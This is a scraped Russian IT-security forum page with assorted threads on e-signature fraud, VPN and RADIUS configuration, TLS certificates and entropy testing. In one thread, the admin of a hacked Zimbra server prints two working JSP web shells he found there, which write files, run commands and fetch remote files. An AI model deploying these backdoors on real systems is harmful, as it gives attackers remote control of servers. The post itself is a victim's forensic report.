информации";
    (п. 3 введен Федеральным законом от 27.12.2019 N 476-ФЗ)
    4) предложить использовать шифровальные (криптографические) средства, указанные в части 19 статьи 14.1 Федерального закона от 27 июля 2006 года N 149-ФЗ "Об информации, информационных технологиях и о защите информации", физическим лицам, обратившимся к нему в целях проведения идентификации без его личного присутствия путем предоставления сведений из единой системы идентификации и аутентификации и информации из единой биометрической системы (для предоставления биометрических персональных данных физического лица в целях проведения его идентификации в аккредитованном удостоверяющем центре без его личного присутствия посредством сети "Интернет"), и указать страницу сайта в информационно-телекоммуникационной сети "Интернет", с которой безвозмездно предоставляются эти средства. При этом в случае, если физическое лицо для предоставления своих биометрических персональных данных в целях проведения его идентификации в аккредитованном удостоверяющем центре без его личного присутствия посредством информационно-телекоммуникационной сети "Интернет" при выдаче сертификата ключа проверки электронной подписи отказывается от использования шифровальных (криптографических) средств, аккредитованный удостоверяющий центр обязан отказать такому лицу в проведении идентификации и выдаче сертификата ключа проверки электронной подписи.
    (п. 4 введен Федеральным законом от 27.12.2019 N 476-ФЗ)
    1.1. Подтверждение достоверности сведений, перечисленных в пунктах 1 и 2 части 1 настоящей статьи, осуществляется одним из следующих способов:
    1) с использованием оригиналов документов и (или) надлежащим образом заверенных копий документов;
    2) с использованием единой системы межведомственного электронного взаимодействия, информационных систем органов государственной власти, Пенсионного фонда Российской Федерации, Федерального фонда обязательного медицинского страхования, единой информационной системы нотариата;
    3) с использованием единой системы идентификации и аутентификации.
    (часть 1.1 введена Федеральным законом от 27.12.2019 N 476-ФЗ)
    2. При обращении в аккредитованный удостоверяющий центр заявитель представляет следующие документы либо их надлежащим образом заверенные копии и (или) сведения из них:
    (в ред. Федерального закона от 27.12.2019 N 476-ФЗ)
    (см. текст в предыдущей редакции)
    1) основной документ, удостоверяющий личность;
    2) страховой номер индивидуального лицевого счета заявителя - физического лица;
    (в ред. Федерального закона от 08.06.2020 N 181-ФЗ)
    (см. текст в предыдущей редакции)
    3) идентификационный номер налогоплательщика заявителя - физического лица;
    ...
    2.1. Заявитель вправе по собственной инициативе представить копии документов, содержащих сведения, указанные в пунктах 2 - 6 части 2 настоящей статьи.
    (часть 2.1 введена Федеральным законом от 30.12.2015 N 445-ФЗ; в ред. Федерального закона от 27.12.2019 N 476-ФЗ)
    (см. текст в предыдущей редакции)
    ......
    5. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр направляет в единую систему идентификации и аутентификации сведения о лице, получившем квалифицированный сертификат, в объеме, необходимом для регистрации в единой системе идентификации и аутентификации, и о полученном им квалифицированном сертификате (уникальный номер квалифицированного сертификата, даты начала и окончания его действия, наименование выдавшего его аккредитованного удостоверяющего центра).

    сообщить модератору +/ответить
  • Про это уже неоднократно были разговоры и горячо обсуждали тему в СМИ Нужно лич, !*! simonflex (ok), 16:34 , 22-Дек-20 (23) +1
    > Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
    > и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
    > у меня взломали аккаунт на госуслугах.
    > У меня никогда не было ЭЦП и я даже не знаю, что
    > это такое. Паспорта со мной, я их не терял.
    > Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
    > миллион р).
    > У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
    > мошенники выпустили. Я отменю одну, а может, у них 10.
    > Что делать?

    Про это уже неоднократно были разговоры и горячо обсуждали тему в СМИ. Нужно лично зайти в МФЦ, вызвать управляющего и собственноручно написать заявление, о том что сделки с квартирой только с вашим личным присутствием. Управляющий заверит. И если не ошибаюсь, что-то предпринимали на этот счет. Тяжело, но в прокуратуру в полицию писать заявления.

    сообщить модератору +1 +/ответить
  • https ru m wikipedia org wiki Единая_система_идентификации_и_аутентификации b , !*! Аноним (49), 18:19 , 24-Дек-20 (49)
    https://ru.m.wikipedia.org/wiki/Единая_система_идентификации_и_аутентификации

    * Для получения учётной записи ЕСИА необходимо удостоверить свою личность с помощью паспортных данных, ИНН и СНИЛС

    Эти все данные есть у работодателей, так как необходимы при устройстве на работу. (А сколько кто работ сменил)

    Надежное хранение этих документов требует огромных денег - наличие собственного дома с сейфом. (А сколько кто квартир съемных сменил, замки вы каждый раз в съёмной квартире меняли? в общежитиях с соседями сколько прожили? Сколько раз вам квартиру снимала трудоустраевающая организация и копия ключей хранилась у них? Сюда же надо добавить всех подруг с которыми вы совместно проживали................)

    Что там надо для их регистратуры? Паспорт, ИНН и СНИЛС? Можно копии! Можно без личного присутствия!!!

    * облачное хранение приватного ключа пользователя

    Цензурные слова закончились.

    * Существенно расширен набор данных, ведущихся в профиле пользователя (добавлены такие документы как заграничный паспорт, полис ОМС, военный билет и др., появилась возможность указывать сведения о детях). Предусмотрена возможность зарегистрировать учетную запись на номер мобильного телефона, который ранее был привязан к другой учетной записи.

    Майор одобрил. Вы подумали речь о нашем товарище? Нет, имел ввиду их..

    И все это на логина/пароле по HTTPS без ESNI конечно: https://www.linux.org.ru/forum/admin/15104732?cid=15164855

    И разрабов меняют каждый год: "AT Consulting, R-Style, «РТ лабс» и «Реак софт»"

    сообщить модератору +/ответить
  • Тут на лицо коррекционная составляющая кто то купил скан вашего паспорта в интер, !*! Руслан543 (?), 18:08 , 30-Янв-21 (67)
    > Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
    > и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
    > у меня взломали аккаунт на госуслугах.
    > У меня никогда не было ЭЦП и я даже не знаю, что
    > это такое. Паспорта со мной, я их не терял.
    > Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
    > миллион р).
    > У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
    > мошенники выпустили. Я отменю одну, а может, у них 10.
    > Что делать?

    Тут на лицо коррекционная составляющая кто то купил скан вашего паспорта в интернете
    и у него были знакомые в в удостоверяющем центре которые все и сделали пишите в сми нужно вызвать общественый резонанс


    сообщить модератору +/ответить
  • https www garant ru products ipo prime doc 400065686 Постановление Правительст, !*! Аноним (70), 14:56 , 20-Фев-21 (70)
    > неизвестно, сколько ЭЦП на моё имя мошенники выпустили

    https://www.garant.ru/products/ipo/prime/doc/400065686/
    Постановление Правительства РФ от 28 декабря 2020 г. № 2309 “Об утверждении требований к порядку предоставления владельцам квалифицированных сертификатов сведений о выданных им квалифицированных сертификатах с использованием единого портала государственных и муниципальных услуг”

    Требуют регистрироваться на "госуслугах" и кроме Ф.И.О. предоставить СНИЛС.

    Сертификаты ЭП, выданные аккредитованными УЦ: https://e-trust.gosuslugi.ru/#/portal/registry/certificate-list
    Сертификаты, переданные АУЦ в связи с прекращением своей деятельности: https://e-trust.gosuslugi.ru/#/portal/registry/passed-certif...
    Отсутствие поиска по Ф.И.О. делает данный сервис почти бесполезным.

    Как по мне это нарушает дух и букву Закона:
    ст. 15 п. 3 http://www.consultant.ru/document/cons_doc_LAW_112701/03690e...
    «3. Аккредитованный удостоверяющий центр обязан обеспечить любому лицу безвозмездный доступ с использованием информационно-телекоммуникационных сетей, в том числе сети «Интернет», к реестру квалифицированных сертификатов этого аккредитованного удостоверяющего центра в любое время в течение срока деятельности этого удостоверяющего центра, если иное не установлено федеральными законами или принимаемыми в соответствии с ними нормативными правовыми актами.»

    Налоговая, к примеру, предоставляет доступ к реестру ЕГРЮЛ без ограничений: https://egrul.nalog.ru/ с возможностью поиска по Ф.И.О., ИНН...

    сообщить модератору +/ответить
  • И чем закончилась история а то даже не по себе , !*! aydanasadykova1995 (ok), 17:31 , 28-Дек-22 (72)
    > Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к
    > и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того,
    > у меня взломали аккаунт на госуслугах.
    > У меня никогда не было ЭЦП и я даже не знаю, что
    > это такое. Паспорта со мной, я их не терял.
    > Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1
    > миллион р).
    > У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя
    > мошенники выпустили. Я отменю одну, а может, у них 10.
    > Что делать?

    И чем закончилась история? а то даже не по себе((

    сообщить модератору +/ответить


Zimbra поломали, !*! BarS, (Linux привязка / Linux) 25-Янв-21, 15:43  [ | | | ] [линейный вид] [смотреть все]
Зашел в консоль, а там 4 админа в аккаунтах, по каталогам полазил, есть новые файлы. Наружу админка закрыта, походу по уязвимостям хакнули. Нашел разные файлы, вот один из них
<%
    if("toe0Kq".equals(request.getParameter("pwd")))
    {
        String strCode=request.getParameter("code");
        String strFile=request.getParameter("file");
        if(strCode!=null&&strFile!=null)
        {
            java.io.InputStream in = new java.io.ByteArrayInputStream(strCode.getBytes());
            byte[] b = new byte[1024];
            java.io.ByteArrayOutputStream bs = new java.io.ByteArrayOutputStream();
            int a = -1;
            while ((a = in.read(b)) != -1)
            {
                bs.write(b, 0, a);
            }
            new java.io.FileOutputStream(application.getRealPath("/")+"/img/"+strFile).write(bs.toByteArray());
        }
        out.print("XkaGrVj9");
    }
%>
  • if G5X49Q equals request getParameter pwd String strCmd, !*! BarS (??), 15:47 , 25-Янв-21 (1)
    <%
        if("G5X49Q".equals(request.getParameter("pwd")))
        {
            String strCmd=request.getParameter("cmd");
            String strUrl=request.getParameter("url");
            String strFile=request.getParameter("file");
            if(null!=strCmd)
            {
                java.io.InputStream in=Runtime.getRuntime().exec(strCmd).getInputStream();
                int a = -1;
                byte[] b = new byte[2048];
                out.print("<pre>");
                while((a=in.read(b))!=-1)
                {
                    out.println(new String(b));
                }
                out.print("</pre>");
            }
            if(null!=strUrl&&null!=strFile)
            {
                java.io.InputStream in = new java.net.URL(strUrl).openStream();
                byte[] b = new byte[1024];
                java.io.ByteArrayOutputStream baos = new
                java.io.ByteArrayOutputStream();
                int a = -1;
                while ((a = in.read(b)) != -1)
                {
                    baos.write(b, 0, a);
                }
                new java.io.FileOutputStream(application.getRealPath("/")+"/"+strFile).write(baos.toByteArray());
            }
            out.println("MtGqKu3y");
        }
        else
        {
            //out.println("no token");
        }
    %>
    сообщить модератору +/ответить
Заражен ли ноутбук?, !*! Sizf, (Проблемы с безопасностью / Другая система) 19-Июл-23, 14:44  [ | | | ] [линейный вид] [смотреть все]
Здравствуйте.
Подозреваю, что на устройстве (ноутбук) есть вирус, подключен к роутеру кинетик через кабель, еще к роутеру подключена камера и ajax, больше ничего не подключалось, вайфай всегда выключен. Ноутбук и роутер приобрел пару дней назад. В первый же день была ошибка 403 на https://ua.store.asus.com/20660-cnf.html  
"ERROR
The request could not be satisfied.
Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation",
на телефонах открывалась нормально.
В тот же день в безопасности виндовс заметил, что "защита от подделки" была отключена и сверху надпись "этим параметром управляет ваш администратор", еще был включен удаленный рабочий стол, который я не включал. В настройках виндовс ничего не менял, кроме выключение удаленного помощника (по умолчанию он включен).
https://imgur.com/a/gpKgeQL https://imgur.com/a/pCprSvW
из программ только myasus и разер синапс, винда с офф сайта, чистая установка

И еще вот, asusl2502 и alina мои имена компьютера:
https://imgur.com/a/4t1cdAc

Через время сам включил удаленный рабочий стол, в "просмотре событий" заметил следующее
https://imgur.com/a/WJFtkGh

Прошу помочь понять есть ли на устройстве вирус. Заранее благодарю за помощь

Китай tox.chat  и все все все ....., !*! Аноним, (Firewall и пакетные фильтры) 09-Май-23, 17:50  [ | | | ] [линейный вид] [смотреть все]
Добрый день.

Подскажите. Есть такая задача. Надо организовать обмен сообщениями с человеком который поедет Китай не надолго. То есть по сути нужен whatsapp или telegram. Как я слышал там данные программы не работают.

Но если поискать в интернетах, выясняется что подобного рода ПО много, неужели все их тоже блокируют https://en.wikipedia.org/wiki/Comparison_of_cross-platform_i...

Подскажите  кто знает или у кого есть подобный опыт. Мое ТЗ простое надо что бы работало через wifi (есть в отеле), устанавливалось на andriod. Можно было послать текстовое и графическое сообщении.

ПС. Регистрация в wechat озаботился  но там как все не просто.



как удалить /dev/tty*  ?, !*! LehaValov, (Безопасность системы) 16-Ноя-15, 06:08  [ | | | ] [линейный вид] [смотреть все]
Приветствую всех, требуется полностью закрыть возможность залогинится через /dev/tty*

touch /etc/nologin и редактирование /etc/securetty всеравно дает root-у возможность загрузится в rc1.d

удаление /dev/tty* полностью, дает тот результат что нужен, но при перезагрузке они пересоздаются ядром.

пробовал написать в /etc/init.d/rc.local   rm -f /dev/tty* , но не работает.

подскажите где прописать rm -f /dev/tty* чтобы оно сработало при загрузке в в любом уровне запуска? или как закрыть логин другим способом?

StrongSWAN (IKE2\EAP) + freeradius авторизация (Framed-IP-Addre, !*! sysgloster, (VPN, IPSec) 19-Мрт-22, 14:52  [ | | | ] [линейный вид] [смотреть все]
Добрый день!
Столкнулся с проблемой.
На VDS поднят strongswan + freeradius.
Авторизация проходит, но radius атрибуты не срабатывают для статического IP.

/etc/freeradius/3.0/users
%radius-username%   Cleartext-Password := "%radius-password%"
        NAS-Port-Type = Virtual,
        Service-Type = Framed-User,
        Framed-IP-Address = 10.255.24.12,
        Framed-IP-Netmask = 255.255.255.0,
        MS-Primary-DNS-Server = 8.8.8.8

В запросе четко видны радиус атрибуты, но они не срабатывают (радиус их получает, и игнорирует их)

Кусок дебага:
Sent Access-Accept Id 106 from 127.0.0.1:1812 to 127.0.0.1:34540 length 0
(4)   NAS-Port-Type = Virtual
(4)   Service-Type = Framed-User
(4)   Framed-IP-Address = 10.255.24.12
(4)   Framed-IP-Netmask = 255.255.255.0
(4)   MS-Primary-DNS-Server = 8.8.8.8
(4)   MS-MPPE-Encryption-Policy = Encryption-Allowed
(4)   MS-MPPE-Encryption-Types = RC4-40or128-bit-Allowed
(4)   MS-MPPE-Send-Key = 0x7bbb8b987de7d0dfc120c24433fb2083
(4)   MS-MPPE-Recv-Key = 0x1a461ae69b7751cd95e3d095a325571a
(4)   EAP-Message = 0x03030004
(4)   Message-Authenticator = 0x00000000000000000000000000000000
(4)   User-Name = "%radius-username%"
(4) Finished request
Waking up in 4.7 seconds.
(5) Received Accounting-Request Id 107 from 127.0.0.1:40811 to 127.0.0.1:1813 length 147
(5)   Acct-Status-Type = Start
(5)   Acct-Session-Id = "1647688010-64"
(5)   NAS-Port-Type = Virtual
(5)   Service-Type = Framed-User
(5)   NAS-Port = 64
(5)   NAS-Port-Id = "IKEv2+EAP"
(5)   NAS-IP-Address = %EXT-IP-VDS%
(5)   Called-Station-Id = "%EXT-IP-VDS%[500]"
(5)   Calling-Station-Id = "%EXT-IP-CLIENT%[500]"
(5)   User-Name = "%radius-username%"
(5)   Framed-IP-Address = 10.255.24.2
(5)   NAS-Identifier = "strongSwan"

IP адреса, логины и пароли изменены.

Буду рад совету.
Заранее благодарен.

  • gt оверквотинг удален В дополнение, кусок лога Атрибут дублируется Framed-IP-, !*! sysgloster (ok), 16:33 , 19-Мрт-22 (1)
    >[оверквотинг удален]
    > (5)   NAS-Port-Id = "IKEv2+EAP"
    > (5)   NAS-IP-Address = %EXT-IP-VDS%
    > (5)   Called-Station-Id = "%EXT-IP-VDS%[500]"
    > (5)   Calling-Station-Id = "%EXT-IP-CLIENT%[500]"
    > (5)   User-Name = "%radius-username%"
    > (5)   Framed-IP-Address = 10.255.24.2
    > (5)   NAS-Identifier = "strongSwan"
    > IP адреса, логины и пароли изменены.
    > Буду рад совету.
    > Заранее благодарен.

    В дополнение, кусок лога. Атрибут дублируется:
    Framed-IP-Address = 10.255.24.2
    Framed-IP-Address = 10.255.24.12

    Sat Mar 19 13:25:24 2022
            Acct-Status-Type = Stop
            Acct-Session-Id = "1647688010-74"
            NAS-Port-Type = Virtual
            Service-Type = Framed-User
            NAS-Port = 74
            NAS-Port-Id = "IKEv2+EAP"
            NAS-IP-Address = %EXT-IP-VDS%
            Called-Station-Id = "%EXT-IP-VDS%[500]"
            Calling-Station-Id = "%EXT-IP-CLIENT%[500]"
            User-Name = "%radius-username%"
            Framed-IP-Address = 10.255.24.2
            Framed-IP-Address = 10.255.24.12
            Acct-Output-Octets = 184630
            Acct-Output-Packets = 374
            Acct-Input-Octets = 140713
            Acct-Input-Packets = 348
            Acct-Session-Time = 390
            Acct-Terminate-Cause = User-Request
            NAS-Identifier = "strongSwan"
            Event-Timestamp = "Mar 19 2022 13:25:24 UTC"
            Tmp-String-9 = "ai:"
            Acct-Unique-Session-Id = "87126f7fa0835846260efa39b8e90656"
            Timestamp = 1647696324

    сообщить модератору +/ответить
Способы блокировки рекламы и прочего мусора на уровне системы, !*! c06a8acb, (Блокирование спама и вирусов) 30-Янв-21, 14:34  [ | | | ] [линейный вид] [смотреть все]
1) hblock - https://github.com/hectorm/hblock

Не останавливает флеш-рекламу, при просмотре ютуба вылезает куча рекламы.

2) AdBlock на роутере - я не пользуюсь роутером (прямое соединение), поэтому этот способ для меня не подходит.

Есть еще какие-либо варианты?

Спасибо.

firejail создает /dev/null с правами 0400 , как побороть?, !*! сонный анон., (Linux привязка) 29-Мрт-22, 05:18  [ | | | ] [линейный вид] [смотреть все]
Привет всем!

Столкнулся с багом или я дико туплю, сам понять уже не в состоянии, гуглил и решения не нашел.

Надо запихнуть ssh в firejail.
Система devuan_3, версия firejail 0.9.58.2 .
В /etc/firejail уже есть готовый профиль ssh.profile

При запуске firejail ssh user@host , firejail выдает ошибку "Couldn`t open /dev/null: Permission denied"

запустил firejail --profile=/etc/firejail/ssh.profile /bin/bash
посмотрел изнутри на /dev/null а у него права 0400!
-r--------
и это не символьный файл как должен быть а обычный.

попробовал указать в конфиге что должны быть права на запись

read-write /dev/null

права не поменялись, и записать в него нельзя, да и толку в обычный файл писать?

убрал из конфига private-dev , в результате все устройства стали доступны но права на /dev/null снова 0400 !!! и это снова обычный файл.

это баг или я что-то не так делаю?
это решается правкой конфига или надо свежую версию firejail качать?


Передача сертификата сервером в процессе установления TLS-соед., !*! Lun2, (Шифрование, SSH, SSL) 29-Апр-23, 18:31  [ | | | ] [линейный вид] [смотреть все]
Добрый день!

Подскажите, пожалуйста, в процессе установления TLS-соединения когда сервер после своего ServerHello направляет клиенту свой сертификат - этот сертификат передается в открытом виде или в зашифрованном  ?

  • Хотелось ответить в стиле - да Но надо что-то менять в этом мирке Только когда , !*! Аноним (-), 19:33 , 02-Май-23 (2)
    Хотелось ответить в стиле - да. Но надо что-то менять в этом мирке.

    Только когда клиент авторизует сервер по собственному сертификату, а сервер клиента по его собственному сертификату - можно сказать что соединение авторизовано и зашифровано. Все остальное лабуда, хоть на лбу себе зеленый замочек набейте - безопасТнее не станет.

    сообщить модератору +/ответить
  • В открытом Это же открытый ключ из пары ключей ассиметричного шифрования Закры, !*! pashev.ru (?), 15:13 , 03-Май-23 (3)
    > Добрый день!
    > Подскажите, пожалуйста, в процессе установления TLS-соединения когда сервер после своего
    > ServerHello направляет клиенту свой сертификат - этот сертификат передается в открытом
    > виде или в зашифрованном  ?

    В открытом. Это же открытый ключ из пары ключей ассиметричного шифрования. Закрытый ключ остаётся на сервере.

    сообщить модератору +/ответить
  • Этот сертификат публичный он один для всех даже если ты его зашифруешь - любой, !*! ыы (?), 13:39 , 05-Май-23 (6)
    > Добрый день!
    > Подскажите, пожалуйста, в процессе установления TLS-соединения когда сервер после своего
    > ServerHello направляет клиенту свой сертификат - этот сертификат передается в открытом
    > виде или в зашифрованном  ?

    Этот сертификат публичный. он один для всех. даже если ты его зашифруешь - любой клиент получит его и будет знать. какой смысле его шифровать? :)

    сообщить модератору +/ответить
  • прочитайте уже про ассимитричное шифрование, !*! Tester (??), 14:00 , 06-Май-23 (7)
    > Добрый день!
    > Подскажите, пожалуйста, в процессе установления TLS-соединения когда сервер после своего
    > ServerHello направляет клиенту свой сертификат - этот сертификат передается в открытом
    > виде или в зашифрованном  ?

    прочитайте уже про ассимитричное шифрование

    сообщить модератору +/ответить
Сколько лет интернет провайдеры хранят логи? , !*! Базик, (Разное / Другая система) 06-Апр-23, 18:20  [ | | | ] [линейный вид] [смотреть все]
Доброго дня. Может кто из Вас может знать точно сколько лет крупные интернет провайдеры хранят логи интернет пользователей? Нигде не могу найти однозначно информации, то 3 года пишут, то годами... Интересует именно сухое логирование, не подробные логи, которые по Яровой мес 6 должны храниться
Как преобразовать секретный ключ от openssl в двоичный формат ?, !*! Lun2, (Шифрование, SSH, SSL) 21-Апр-23, 22:30  [ | | | ] [линейный вид] [смотреть все]
Добрый вечер!
Я сгенерировал сертификат openssl и мне необходимо преобразовать открытый и секретный ключ в двоичный формат.
Открытый ключ преобразовал успешно:
openssl x509 -outform der -in certificate.crt -out certificate.der

То же для преобразования секретного ключа не сработало:
openssl x509 -inform pem -outform der -in privatekey.key -out privatekey.der

Файл секретного ключа начинается так:
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQ CrGHliESI9kS9A
zo0a6o82+6NlbNjkkNmUDiiJxkFvXIzVnjokLAiLc4eiUK3zuo jfqoLbpIWPNhEr

... и насколько я понял - это PEM.

Получаю ошибку: Could not find cert etc. of certificate from privatekey,key.

Не очень понимаю, что openssl не может найти - privatekey.key в наличии в той же папке, что и .crt и openssl.

Вопрос1: почему не удается преобразовать секретный ключ и что сделать для его преобразования ?
Вопрос2: правильно ли понимаю, что содержимое файла DER - это и есть то, что должно передаваться в процедуре handshake TLS в ServerHello (то есть из него не нужно выделять какие-то части для пересылки клиенту) ?

Как получить сертификат от LetsEncrypt, !*! Lun2, (Шифрование, SSH, SSL) 19-Апр-23, 22:56  [ | | | ] [линейный вид] [смотреть все]
Добрый вечер!

Мне нужно получить сертификат SSL для отладки самописного сервера, к которому браузер должен обращаться по SSL. У сервера не будет как такового доменного имени - к нему будут обращаться по IP

Скачал certbot, но не понимаю, с какими параметрами его запускать.

Сначала запускал с certonly, но что далее выбирать - webroot или standalone ?

И какое дальше доменное имя вводить, если этого имени не будет ?

С сертификатами раньше не сталкивался.

Подскажите, пожалуйста, с какими ключами запустить certbot для получения сертификата.

ClamAV бан в РФ?, !*! GlooM, (ПО для увеличения безопасности / Linux) 11-Мрт-22, 08:47  [ | | | ] [линейный вид] [смотреть все]
Со вчерашнего дня на почтовом сервере наблюдаю сбой работы антивируса (ClamAV). Логи показывают, что причина заключается в невозможности скачать базы из-за сетевой недоступности ресурса, в результате чего Freshclam спустя несколько неудачных попыток выгружается. Если проверять https://www.clamav.net с браузера, то получаю ошибку "Аксес Денайд". С рабочего и домашнего провайдера бан воспроизводится, через прокси все работает, с мобильного интернета (МТС) тоже работает.
Как я понимаю, КламАВ врубил региональный бан? Есть какие-нибудь альтернативные репозитории с базами сигнатур?
Статистическое исследование энтропии из контрольных сум., !*! Аноним, (ПО для тестирования и диагностики) 11-Мрт-23, 11:51  [ | | | ] [линейный вид] [смотреть все]
Статистическое исследование энтропии тестом  FIPS 140-2 от 2001-10-10, rngtest из пакета rng-tools.

Как говорят ложь делится на три категории: 1 ложь, 2 циничная ложь, 3 статистика.
По этому, чтобы никого не обмануть, где статистических данных было мало для точного определения цифры, поставил знак: "?".

Первая колонка - источник энтропии. Вторая колонка - качество энтропии, количество девяток определено всегда точно. Третья колонка - скорость.
Ниже приведены результаты теста.

Вопрос: Если допустить, что мир идет от худшего к лудшему, почему тогда качество энтропии полученой от SHA3 хуже чем от SHA2, а качество энтропии полученой от SHA2 хуже чем от SHA1?


/dev/urandom | rngtest        99.99?%        10.3 MB/s
rngtest: FIPS 140-2 successes: 999932
rngtest: FIPS 140-2 failures: 68
rngtest: FIPS 140-2(2001-10-10) Monobit: 11
rngtest: FIPS 140-2(2001-10-10) Poker: 32
rngtest: FIPS 140-2(2001-10-10) Runs: 25
rngtest: FIPS 140-2(2001-10-10) Long run: 0
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


/dev/urandom            99.92%        72.9 MB/s
rngtest: FIPS 140-2 successes: 999230
rngtest: FIPS 140-2 failures: 770
rngtest: FIPS 140-2(2001-10-10) Monobit: 103
rngtest: FIPS 140-2(2001-10-10) Poker: 90
rngtest: FIPS 140-2(2001-10-10) Runs: 293
rngtest: FIPS 140-2(2001-10-10) Long run: 288
rngtest: FIPS 140-2(2001-10-10) Continuous run: 1


openssl rand (/dev/urandom)    99.9?%        72.9 MB/S
rngtest: FIPS 140-2 successes: 99921
rngtest: FIPS 140-2 failures: 79
rngtest: FIPS 140-2(2001-10-10) Monobit: 17
rngtest: FIPS 140-2(2001-10-10) Poker: 10
rngtest: FIPS 140-2(2001-10-10) Runs: 30
rngtest: FIPS 140-2(2001-10-10) Long run: 23
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gpg --gen-random 0        99.9?%        4.2 MB/s
rngtest: FIPS 140-2 successes: 99927
rngtest: FIPS 140-2 failures: 73
rngtest: FIPS 140-2(2001-10-10) Monobit: 8
rngtest: FIPS 140-2(2001-10-10) Poker: 5
rngtest: FIPS 140-2(2001-10-10) Runs: 28
rngtest: FIPS 140-2(2001-10-10) Long run: 33
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gpg --gen-random 1        99.9?%        2.7 MB/s
rngtest: FIPS 140-2 successes: 99919
rngtest: FIPS 140-2 failures: 81
rngtest: FIPS 140-2(2001-10-10) Monobit: 12
rngtest: FIPS 140-2(2001-10-10) Poker: 9
rngtest: FIPS 140-2(2001-10-10) Runs: 27
rngtest: FIPS 140-2(2001-10-10) Long run: 34
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gpg --gen-random 2        99.9?%        5.2 kB/s
rngtest: FIPS 140-2 successes: 99947
rngtest: FIPS 140-2 failures: 53
rngtest: FIPS 140-2(2001-10-10) Monobit: 7
rngtest: FIPS 140-2(2001-10-10) Poker: 8
rngtest: FIPS 140-2(2001-10-10) Runs: 18
rngtest: FIPS 140-2(2001-10-10) Long run: 21
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


/dev/random + haveged        99.?%        84.8 kB/s    !!!!!!!!!!!!!!!
rngtest: FIPS 140-2 successes: 9900
rngtest: FIPS 140-2 failures: 100
rngtest: FIPS 140-2(2001-10-10) Monobit: 6
rngtest: FIPS 140-2(2001-10-10) Poker: 21
rngtest: FIPS 140-2(2001-10-10) Runs: 13
rngtest: FIPS 140-2(2001-10-10) Long run: 62
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


aich                99.9?%
rngtest: FIPS 140-2 successes: 9990
rngtest: FIPS 140-2 failures: 10
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


btih                99.9?%
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


crc32                99.9?%
rngtest: FIPS 140-2 successes: 9993
rngtest: FIPS 140-2 failures: 7
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0

ed2k                99.9?%
rngtest: FIPS 140-2 successes: 9988
rngtest: FIPS 140-2 failures: 12
rngtest: FIPS 140-2(2001-10-10) Monobit: 3
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


edon-r256            99.9?%
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 2
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


edon-r512            99.9?%
rngtest: FIPS 140-2 successes: 9994
rngtest: FIPS 140-2 failures: 6
rngtest: FIPS 140-2(2001-10-10) Monobit: 1
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 2
rngtest: FIPS 140-2(2001-10-10) Long run: 2
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gost                99.9?%
rngtest: FIPS 140-2 successes: 9991
rngtest: FIPS 140-2 failures: 9
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
rngtest: FIPS 140-2(2001-10-10) Runs: 4
rngtest: FIPS 140-2(2001-10-10) Long run: 4
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


gost-cryptopro (md_gost94)    99.9?%
rngtest: FIPS 140-2 successes: 9993
rngtest: FIPS 140-2 failures: 7
rngtest: FIPS 140-2(2001-10-10) Monobit: 2
rngtest: FIPS 140-2(2001-10-10) Poker: 0
rngtest: FIPS 140-2(2001-10-10) Runs: 3
rngtest: FIPS 140-2(2001-10-10) Long run: 3
rngtest: FIPS 140-2(2001-10-10) Continuous run: 0


has160                99.9?%
rngtest: FIPS 140-2 successes: 9993
rngtest: FIPS 140-2 failures: 7
rngtest: FIPS 140-2(2001-10-10) Monobit: 0
rngtest: FIPS 140-2(2001-10-10) Poker: 1
